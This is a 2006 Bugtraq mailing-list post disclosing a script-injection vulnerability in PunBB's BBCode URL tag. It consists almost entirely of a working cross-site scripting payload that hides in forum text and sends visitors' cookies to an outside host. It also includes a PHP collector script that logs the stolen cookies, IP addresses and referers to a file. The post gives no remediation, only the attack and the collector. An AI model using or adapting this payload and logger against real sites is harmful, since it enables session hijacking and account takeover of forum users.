
Date: 16 Jan 2006 11:34:48 -0000
From: night_warrior771@...mail.com
To: bugtraq@...urityfocus.com
Subject: PunBB BBCode URL Tag Script Injection Vulnerability


##Night_Warrior<Kurdish Hacker>
##night_warrior771[at]hotmail.com
##PunBB BBCode URL Tag Script Injection Vulnerability
##Contact :night_warrior771[at]hotmail.com

Vulnerable:

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://nigwar.tollfreepage.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

<?php
cookies.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>

Contact :night_warrior771[at]hotmail.com
Night_Warrior


